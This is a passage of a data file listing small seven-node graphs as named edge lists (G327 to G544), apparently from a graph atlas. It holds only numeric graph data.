[[7, 3], [6, 7], [3, 6], [2, 3], [1, 2], [5, 2], [4, 2]]],
['edgelist',
'G327',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [6, 5], [3, 2], [7, 4]]],
['edgelist',
'G328',
7,
[[3, 6], [7, 3], [6, 7], [5, 6], [4, 7], [2, 3], [1, 2]]],
['edgelist',
'G329',
7,
[[3, 6], [7, 3], [2, 5], [2, 3], [1, 2], [5, 1], [1, 4]]],
['edgelist',
'G330',
7,
[[7, 6], [2, 3], [5, 2], [1, 5], [4, 1], [2, 4], [4, 5]]],
['edgelist',
'G331',
7,
[[5, 2], [1, 5], [2, 1], [4, 7], [3, 4], [1, 3], [6, 1]]],
['edgelist',
'G332',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [3, 2], [6, 3], [7, 2]]],
['edgelist',
'G333',
7,
[[5, 2], [1, 5], [2, 1], [3, 4], [1, 3], [6, 1], [7, 6]]],
['edgelist',
'G334',
7,
[[1, 2], [6, 1], [7, 6], [4, 7], [3, 4], [1, 3], [5, 1]]],
['edgelist',
'G335',
7,
[[2, 1], [5, 2], [3, 5], [4, 3], [5, 4], [1, 5], [7, 6]]],
['edgelist',
'G336',
7,
[[4, 7], [3, 4], [2, 3], [1, 2], [5, 1], [2, 5], [6, 5]]],
['edgelist',
'G337',
7,
[[2, 1], [6, 2], [7, 6], [3, 7], [2, 3], [4, 3], [5, 4]]],
['edgelist',
'G338',
7,
[[3, 4], [2, 3], [1, 2], [5, 1], [6, 5], [7, 6], [5, 2]]],
['edgelist',
'G339',
7,
[[6, 3], [7, 6], [3, 7], [2, 3], [5, 2], [1, 5], [4, 2]]],
['edgelist',
'G340',
7,
[[3, 4], [2, 3], [1, 2], [5, 1], [6, 5], [7, 6], [6, 3]]],
['edgelist',
'G341',
7,
[[2, 5], [1, 2], [3, 1], [4, 3], [6, 4], [1, 6], [7, 4]]],
['edgelist',
'G342',
7,
[[3, 2], [4, 3], [7, 4], [6, 7], [1, 6], [3, 1], [6, 5]]],
['edgelist',
'G343',
7,
[[6, 3], [7, 6], [3, 7], [2, 3], [1, 2], [5, 1], [4, 1]]],
['edgelist',
'G344',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [3, 2], [6, 3], [7, 3]]],
['edgelist',
'G345',
7,
[[2, 1], [3, 2], [6, 3], [5, 6], [1, 5], [5, 2], [7, 4]]],
['edgelist',
'G346',
7,
[[3, 6], [7, 3], [1, 5], [4, 1], [2, 4], [5, 2], [2, 1]]],
['edgelist',
'G347',
7,
[[7, 6], [1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [4, 3]]],
['edgelist',
'G348',
7,
[[3, 2], [6, 3], [5, 6], [1, 5], [4, 1], [7, 4], [3, 7]]],
['edgelist',
'G349',
7,
[[5, 1], [4, 5], [2, 4], [3, 2], [6, 3], [7, 6], [3, 7]]],
['edgelist',
'G350',
7,
[[7, 6], [3, 7], [2, 3], [5, 2], [1, 5], [4, 1], [2, 4]]],
['edgelist',
'G351',
7,
[[5, 2], [1, 5], [3, 1], [4, 3], [7, 4], [6, 7], [1, 6]]],
['edgelist',
'G352',
7,
[[1, 5], [4, 1], [5, 4], [3, 2], [6, 3], [7, 6], [3, 7]]],
['edgelist',
'G353',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [6, 7], [1, 7]]],
['edgelist',
'G354',
7,
[[2, 1], [5, 2], [1, 5], [6, 3], [7, 6], [4, 7], [3, 4]]],
['edgelist',
'G355',
7,
[[1, 2], [5, 1], [6, 5], [3, 6], [2, 3], [6, 2], [5, 2], [3, 5]]],
['edgelist',
'G356',
7,
[[5, 2], [6, 5], [3, 6], [2, 3], [1, 2], [6, 1], [1, 5], [3, 1]]],
['edgelist',
'G357',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [4, 5], [6, 2], [7, 2]]],
['edgelist',
'G358',
7,
[[5, 2], [6, 5], [3, 6], [2, 3], [6, 2], [7, 6], [3, 5], [4, 3]]],
['edgelist',
'G359',
7,
[[2, 4], [1, 2], [5, 1], [3, 5], [2, 3], [5, 2], [6, 5], [2, 6]]],
['edgelist',
'G360',
7,
[[3, 1], [4, 3], [7, 4], [6, 7], [1, 6], [4, 1], [1, 7], [5, 1]]],
['edgelist',
'G361',
7,
[[2, 1], [3, 2], [6, 3], [5, 6], [1, 5], [3, 1], [6, 1], [7, 6]]],
['edgelist',
'G362',
7,
[[2, 1], [3, 2], [4, 3], [2, 4], [5, 4], [3, 5], [6, 3], [4, 6]]],
['edgelist',
'G363',
7,
[[3, 1], [4, 3], [7, 4], [6, 7], [1, 6], [4, 1], [7, 1], [5, 6]]],
['edgelist',
'G364',
7,
[[2, 1], [3, 2], [5, 4], [2, 6], [5, 2], [3, 5], [6, 3], [4, 6]]],
['edgelist',
'G365',
7,
[[4, 6], [3, 2], [5, 4], [2, 6], [5, 2], [3, 5], [6, 3], [5, 7]]],
['edgelist',
'G366',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [4, 5], [3, 2], [6, 3]]],
['edgelist',
'G367',
7,
[[4, 6], [3, 2], [5, 4], [2, 6], [5, 2], [3, 5], [6, 3], [1, 4]]],
['edgelist',
'G368',
7,
[[5, 1], [3, 5], [1, 3], [4, 1], [3, 4], [6, 3], [7, 6], [3, 7]]],
['edgelist',
'G369',
7,
[[4, 3], [7, 4], [6, 7], [3, 6], [1, 3], [6, 1], [5, 6], [3, 5]]],
['edgelist',
'G370',
7,
[[1, 6], [5, 1], [3, 5], [6, 3], [2, 6], [5, 2], [4, 5], [6, 4]]],
['edgelist',
'G371',
7,
[[3, 4], [2, 3], [5, 2], [6, 5], [2, 6], [6, 3], [7, 6], [4, 7]]],
['edgelist',
'G372',
7,
[[6, 3], [5, 6], [1, 5], [4, 1], [7, 4], [3, 7], [5, 3], [4, 3]]],
['edgelist',
'G373',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [4, 3], [6, 5], [3, 6]]],
['edgelist',
'G374',
7,
[[6, 7], [3, 6], [7, 3], [4, 3], [5, 4], [1, 5], [4, 1], [3, 5]]],
['edgelist',
'G375',
7,
[[2, 1], [6, 1], [4, 3], [2, 4], [6, 3], [7, 2], [7, 3], [7, 6]]],
['edgelist',
'G376',
7,
[[6, 5], [7, 6], [4, 7], [1, 4], [5, 1], [3, 5], [4, 3], [1, 3]]],
['edgelist',
'G377',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 3], [2, 6]]],
['edgelist',
'G378',
7,
[[6, 1], [7, 3], [1, 7], [2, 1], [3, 2], [6, 3], [5, 6], [5, 7]]],
['edgelist',
'G379',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [3, 2], [2, 6], [7, 2]]],
['edgelist',
'G380',
7,
[[1, 3], [5, 1], [2, 5], [1, 2], [4, 1], [2, 4], [6, 2], [7, 2]]],
['edgelist',
'G381',
7,
[[5, 3], [1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [2, 6], [7, 2]]],
['edgelist',
'G382',
7,
[[1, 5], [4, 1], [5, 4], [2, 5], [4, 2], [2, 6], [3, 2], [7, 2]]],
['edgelist',
'G383',
7,
[[3, 2], [1, 3], [4, 1], [6, 4], [3, 6], [4, 3], [5, 4], [7, 6]]],
['edgelist',
'G384',
7,
[[5, 3], [1, 5], [4, 1], [2, 4], [5, 2], [4, 5], [2, 6], [7, 2]]],
['edgelist',
'G385',
7,
[[3, 2], [1, 3], [4, 1], [6, 4], [3, 6], [7, 6], [5, 4], [6, 1]]],
['edgelist',
'G386',
7,
[[2, 1], [3, 2], [4, 3], [2, 4], [5, 3], [4, 5], [5, 6], [7, 5]]],
['edgelist',
'G387',
7,
[[7, 6], [2, 3], [5, 2], [1, 5], [4, 1], [2, 4], [1, 2], [4, 5]]],
['edgelist',
'G388',
7,
[[1, 2], [7, 6], [3, 4], [7, 5], [7, 4], [7, 3], [7, 1], [7, 2]]],
['edgelist',
'G389',
7,
[[7, 5], [2, 3], [3, 4], [7, 6], [5, 6], [7, 3], [7, 1], [7, 2]]],
['edgelist',
'G390',
7,
[[1, 2], [2, 3], [3, 4], [7, 6], [7, 5], [7, 4], [7, 1], [7, 3]]],
['edgelist',
'G391',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [7, 2], [6, 2], [3, 6]]],
['edgelist',
'G392',
7,
[[4, 1], [3, 4], [5, 3], [1, 5], [2, 1], [3, 2], [6, 3], [7, 3]]],
['edgelist',
'G393',
7,
[[3, 2], [4, 3], [7, 4], [6, 7], [1, 6], [3, 1], [6, 3], [5, 6]]],
['edgelist',
'G394',
7,
[[2, 1], [3, 2], [4, 3], [5, 4], [6, 3], [2, 6], [7, 2], [3, 7]]],
['edgelist',
'G395',
7,
[[3, 6], [5, 3], [2, 5], [4, 2], [1, 4], [2, 1], [3, 2], [7, 3]]],
['edgelist',
'G396',
7,
[[5, 6], [1, 5], [4, 1], [3, 4], [5, 3], [2, 5], [4, 2], [7, 4]]],
['edgelist',
'G397',
7,
[[1, 2], [5, 1], [2, 5], [3, 2], [5, 3], [6, 5], [2, 6], [7, 4]]],
['edgelist',
'G398',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [2, 7], [6, 1]]],
['edgelist',
'G399',
7,
[[5, 6], [1, 5], [2, 1], [5, 2], [4, 1], [2, 4], [7, 2], [3, 7]]],
['edgelist',
'G400',
7,
[[3, 6], [5, 3], [1, 5], [2, 1], [5, 2], [4, 1], [2, 4], [7, 2]]],
['edgelist',
'G401',
7,
[[2, 7], [3, 2], [1, 3], [2, 1], [5, 2], [4, 5], [3, 4], [5, 6]]],
['edgelist',
'G402',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [2, 7], [6, 4]]],
['edgelist',
'G403',
7,
[[1, 5], [4, 1], [5, 4], [2, 5], [4, 2], [6, 2], [7, 3], [2, 7]]],
['edgelist',
'G404',
7,
[[3, 4], [2, 3], [1, 2], [6, 1], [5, 6], [1, 5], [3, 1], [7, 6]]],
['edgelist',
'G405',
7,
[[5, 6], [1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [4, 3], [7, 3]]],
['edgelist',
'G406',
7,
[[3, 4], [2, 3], [1, 2], [5, 1], [6, 5], [5, 2], [3, 7], [6, 3]]],
['edgelist',
'G407',
7,
[[1, 2], [2, 3], [3, 4], [7, 4], [5, 6], [7, 3], [7, 1], [7, 2]]],
['edgelist',
'G408',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [1, 2], [3, 2], [6, 3], [7, 3]]],
['edgelist',
'G409',
7,
[[1, 2], [2, 3], [3, 4], [7, 6], [5, 6], [7, 3], [7, 5], [7, 2]]],
['edgelist',
'G410',
7,
[[1, 2], [5, 1], [1, 3], [6, 1], [7, 6], [4, 7], [3, 4], [6, 3]]],
['edgelist',
'G411',
7,
[[1, 5], [4, 1], [3, 4], [5, 3], [2, 5], [4, 2], [3, 6], [7, 3]]],
['edgelist',
'G412',
7,
[[5, 6], [4, 5], [2, 4], [3, 2], [7, 3], [5, 7], [4, 3], [1, 2]]],
['edgelist',
'G413',
7,
[[2, 1], [3, 7], [4, 3], [5, 4], [6, 3], [2, 6], [7, 2], [7, 6]]],
['edgelist',
'G414',
7,
[[3, 4], [2, 3], [1, 2], [5, 1], [6, 5], [7, 6], [6, 3], [5, 2]]],
['edgelist',
'G415',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [4, 5], [3, 2], [3, 6], [7, 3]]],
['edgelist',
'G416',
7,
[[1, 7], [5, 1], [2, 5], [4, 2], [1, 4], [3, 5], [4, 3], [6, 3]]],
['edgelist',
'G417',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [4, 3], [2, 1], [7, 6]]],
['edgelist',
'G418',
7,
[[1, 2], [5, 1], [4, 3], [7, 4], [6, 7], [3, 6], [7, 3], [4, 6]]],
['edgelist',
'G419',
7,
[[6, 3], [7, 6], [3, 7], [5, 3], [1, 5], [4, 1], [3, 4], [2, 3]]],
['edgelist',
'G420',
7,
[[3, 1], [2, 3], [1, 2], [6, 1], [5, 6], [1, 5], [7, 1], [4, 7]]],
['edgelist',
'G421',
7,
[[1, 2], [3, 1], [4, 3], [3, 2], [2, 5], [6, 5], [6, 4], [2, 7]]],
['edgelist',
'G422',
7,
[[2, 7], [3, 2], [1, 3], [2, 1], [5, 2], [4, 5], [3, 4], [6, 7]]],
['edgelist',
'G423',
7,
[[7, 2], [1, 7], [2, 1], [6, 2], [1, 6], [3, 2], [4, 3], [5, 4]]],
['edgelist',
'G424',
7,
[[7, 6], [3, 7], [2, 3], [5, 2], [4, 5], [1, 4], [5, 1], [3, 5]]],
['edgelist',
'G425',
7,
[[2, 7], [1, 2], [6, 1], [2, 6], [4, 1], [5, 4], [3, 5], [1, 3]]],
['edgelist',
'G426',
7,
[[3, 7], [5, 3], [1, 5], [2, 1], [5, 2], [4, 5], [6, 4], [3, 6]]],
['edgelist',
'G427',
7,
[[2, 1], [3, 2], [7, 3], [6, 7], [2, 6], [5, 2], [4, 5], [3, 4]]],
['edgelist',
'G428',
7,
[[7, 2], [5, 4], [2, 1], [6, 2], [4, 3], [3, 2], [5, 7], [6, 5]]],
['edgelist',
'G429',
7,
[[5, 3], [1, 5], [2, 1], [5, 2], [4, 5], [7, 4], [6, 7], [4, 6]]],
['edgelist',
'G430',
7,
[[5, 2], [3, 5], [1, 3], [7, 1], [4, 7], [1, 4], [6, 1], [5, 6]]],
['edgelist',
'G431',
7,
[[6, 7], [5, 6], [1, 5], [4, 1], [3, 4], [5, 3], [2, 5], [4, 2]]],
['edgelist',
'G432',
7,
[[7, 4], [6, 7], [5, 6], [1, 5], [2, 1], [3, 2], [6, 3], [5, 2]]],
['edgelist',
'G433',
7,
[[1, 2], [3, 1], [4, 3], [3, 2], [2, 5], [6, 5], [6, 4], [5, 7]]],
['edgelist',
'G434',
7,
[[5, 1], [4, 5], [3, 4], [7, 3], [6, 7], [2, 6], [5, 2], [3, 2]]],
['edgelist',
'G435',
7,
[[7, 2], [1, 7], [5, 4], [6, 2], [1, 6], [3, 2], [4, 3], [6, 7]]],
['edgelist',
'G436',
7,
[[7, 3], [6, 7], [4, 6], [7, 4], [5, 4], [1, 5], [2, 1], [5, 2]]],
['edgelist',
'G437',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 7], [6, 2]]],
['edgelist',
'G438',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 7], [5, 3]]],
['edgelist',
'G439',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [6, 7], [1, 6]]],
['edgelist',
'G440',
7,
[[5, 1], [3, 5], [4, 3], [7, 4], [6, 7], [5, 6], [2, 3], [6, 2]]],
['edgelist',
'G441',
7,
[[6, 2], [3, 5], [4, 3], [1, 4], [6, 1], [5, 6], [2, 3], [1, 7]]],
['edgelist',
'G442',
7,
[[6, 7], [3, 6], [5, 3], [1, 5], [4, 1], [3, 4], [2, 5], [4, 2]]],
['edgelist',
'G443',
7,
[[1, 5], [2, 1], [5, 2], [4, 5], [6, 4], [7, 6], [3, 7], [5, 3]]],
['edgelist',
'G444',
7,
[[1, 2], [7, 6], [3, 4], [4, 5], [7, 5], [1, 6], [7, 3], [7, 2]]],
['edgelist',
'G445',
7,
[[2, 3], [1, 2], [5, 1], [6, 5], [3, 6], [4, 3], [7, 4], [6, 7]]],
['edgelist',
'G446',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 7], [2, 7]]],
['edgelist',
'G447',
7,
[[7, 3], [6, 7], [3, 6], [2, 3], [5, 2], [1, 5], [4, 1], [2, 4]]],
['edgelist',
'G448',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 6], [7, 2]]],
['edgelist',
'G449',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 1], [7, 4]]],
['edgelist',
'G450',
7,
[[1, 5], [2, 1], [4, 3], [2, 5], [3, 6], [6, 4], [7, 5], [7, 4]]],
['edgelist',
'G451',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [7, 3], [6, 7], [3, 6]]],
['edgelist',
'G452',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [3, 5], [1, 4]]],
['edgelist',
'G453',
7,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 3]]],
['edgelist',
'G454',
7,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [1, 5]]],
['edgelist',
'G455',
7,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4], [5, 6]]],
['edgelist',
'G456',
7,
[[3, 1], [5, 2], [2, 3], [6, 5], [3, 6], [4, 2], [6, 4], [4, 3], [5, 4]]],
['edgelist',
'G457',
7,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 6]]],
['edgelist',
'G458',
7,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [5, 6]]],
['edgelist',
'G459',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [3, 6], [1, 6], [3, 1], [4, 1]]],
['edgelist',
'G460',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [1, 5], [2, 1], [5, 2]]],
['edgelist',
'G461',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [5, 2], [2, 1], [6, 2]]],
['edgelist',
'G462',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 5], [5, 1], [6, 1]]],
['edgelist',
'G463',
7,
[[5, 4], [1, 5], [2, 1], [3, 2], [4, 3], [1, 6], [6, 4], [1, 4], [2, 6]]],
['edgelist',
'G464',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [4, 3], [1, 4], [5, 1]]],
['edgelist',
'G465',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [4, 3], [1, 4], [3, 5]]],
['edgelist',
'G466',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [3, 6], [1, 6], [3, 1], [6, 2]]],
['edgelist',
'G467',
7,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [3, 1]]],
['edgelist',
'G468',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 5], [6, 3], [6, 4]]],
['edgelist',
'G469',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [6, 2]]],
['edgelist',
'G470',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4], [5, 3], [6, 3]]],
['edgelist',
'G471',
7,
[[3, 4], [1, 3], [4, 1], [5, 4], [2, 5], [6, 2], [5, 6], [2, 1], [6, 3]]],
['edgelist',
'G472',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4], [6, 3], [5, 2]]],
['edgelist',
'G473',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 1], [1, 5], [1, 7]]],
['edgelist',
'G474',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 1], [1, 5], [3, 7]]],
['edgelist',
'G475',
7,
[[2, 3], [4, 2], [1, 4], [2, 1], [3, 1], [4, 3], [6, 4], [5, 1], [2, 7]]],
['edgelist',
'G476',
7,
[[1, 2], [3, 5], [1, 3], [4, 2], [4, 3], [3, 2], [5, 2], [6, 3], [3, 7]]],
['edgelist',
'G477',
7,
[[1, 2], [3, 5], [1, 3], [6, 3], [4, 2], [4, 3], [3, 2], [5, 2], [2, 7]]],
['edgelist',
'G478',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [2, 6], [2, 7]]],
['edgelist',
'G479',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [2, 6], [5, 7]]],
['edgelist',
'G480',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [3, 2], [6, 2], [2, 7]]],
['edgelist',
'G481',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5], [5, 7]]],
['edgelist',
'G482',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5], [4, 7]]],
['edgelist',
'G483',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [3, 2], [6, 2], [1, 7]]],
['edgelist',
'G484',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [2, 7]]],
['edgelist',
'G485',
7,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [6, 4], [3, 7]]],
['edgelist',
'G486',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [4, 1], [6, 2], [1, 7]]],
['edgelist',
'G487',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 1], [1, 5], [6, 7]]],
['edgelist',
'G488',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [5, 7]]],
['edgelist',
'G489',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5], [3, 7]]],
['edgelist',
'G490',
7,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [6, 4], [6, 7]]],
['edgelist',
'G491',
7,
[[2, 3], [4, 2], [1, 4], [2, 1], [3, 1], [4, 3], [5, 1], [7, 6], [7, 4]]],
['edgelist',
'G492',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [1, 7]]],
['edgelist',
'G493',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 7], [6, 5], [1, 4], [3, 5]]],
['edgelist',
'G494',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [3, 2], [6, 2], [6, 7]]],
['edgelist',
'G495',
7,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [6, 4], [5, 7]]],
['edgelist',
'G496',
7,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 7]]],
['edgelist',
'G497',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [3, 7]]],
['edgelist',
'G498',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [4, 1], [6, 2], [6, 7]]],
['edgelist',
'G499',
7,
[[1, 2], [3, 6], [1, 3], [6, 5], [4, 2], [4, 3], [4, 1], [6, 2], [3, 7]]],
['edgelist',
'G500',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [6, 2], [6, 4], [1, 7]]],
['edgelist',
'G501',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [1, 6], [6, 5], [6, 7]]],
['edgelist',
'G502',
7,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4], [6, 7]]],
['edgelist',
'G503',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5], [5, 7]]],
['edgelist',
'G504',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 3], [1, 3], [1, 7]]],
['edgelist',
'G505',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5], [4, 7]]],
['edgelist',
'G506',
7,
[[1, 2], [3, 5], [1, 3], [6, 3], [4, 2], [4, 3], [3, 2], [5, 2], [6, 7]]],
['edgelist',
'G507',
7,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [5, 7]]],
['edgelist',
'G508',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [3, 7]]],
['edgelist',
'G509',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [7, 6], [7, 2]]],
['edgelist',
'G510',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5], [3, 7]]],
['edgelist',
'G511',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5], [1, 7]]],
['edgelist',
'G512',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [7, 6], [4, 7], [2, 7], [1, 2], [2, 5]]],
['edgelist',
'G513',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [1, 7]]],
['edgelist',
'G514',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2], [5, 7]]],
['edgelist',
'G515',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5], [6, 7]]],
['edgelist',
'G516',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [5, 7]]],
['edgelist',
'G517',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [6, 7]]],
['edgelist',
'G518',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [7, 6], [4, 7], [2, 7], [1, 2], [1, 5]]],
['edgelist',
'G519',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 3], [1, 3], [2, 7]]],
['edgelist',
'G520',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 3], [1, 3], [5, 7]]],
['edgelist',
'G521',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2], [3, 7]]],
['edgelist',
'G522',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [4, 7]]],
['edgelist',
'G523',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [3, 7]]],
['edgelist',
'G524',
7,
[[1, 2], [3, 6], [1, 3], [6, 2], [4, 2], [4, 3], [3, 2], [7, 1], [7, 5]]],
['edgelist',
'G525',
7,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [2, 7]]],
['edgelist',
'G526',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [6, 7]]],
['edgelist',
'G527',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [2, 7]]],
['edgelist',
'G528',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [1, 7]]],
['edgelist',
'G529',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [4, 7]]],
['edgelist',
'G530',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [7, 6], [4, 7], [2, 7], [1, 2], [3, 5]]],
['edgelist',
'G531',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6], [4, 7]]],
['edgelist',
'G532',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [2, 7]]],
['edgelist',
'G533',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 2], [5, 7]]],
['edgelist',
'G534',
7,
[[1, 2], [3, 6], [1, 3], [6, 2], [4, 2], [4, 3], [4, 1], [7, 5], [7, 1]]],
['edgelist',
'G535',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [6, 3], [6, 1], [2, 7]]],
['edgelist',
'G536',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2], [7, 1]]],
['edgelist',
'G537',
7,
[[6, 4], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [7, 1], [7, 3]]],
['edgelist',
'G538',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [6, 3], [6, 1], [1, 7]]],
['edgelist',
'G539',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6], [6, 7]]],
['edgelist',
'G540',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [5, 7]]],
['edgelist',
'G541',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [7, 6], [4, 7], [2, 7], [1, 2], [6, 5]]],
['edgelist',
'G542',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 2], [6, 3], [6, 7]]],
['edgelist',
'G543',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6], [2, 7]]],
['edgelist',
'G544',
7,
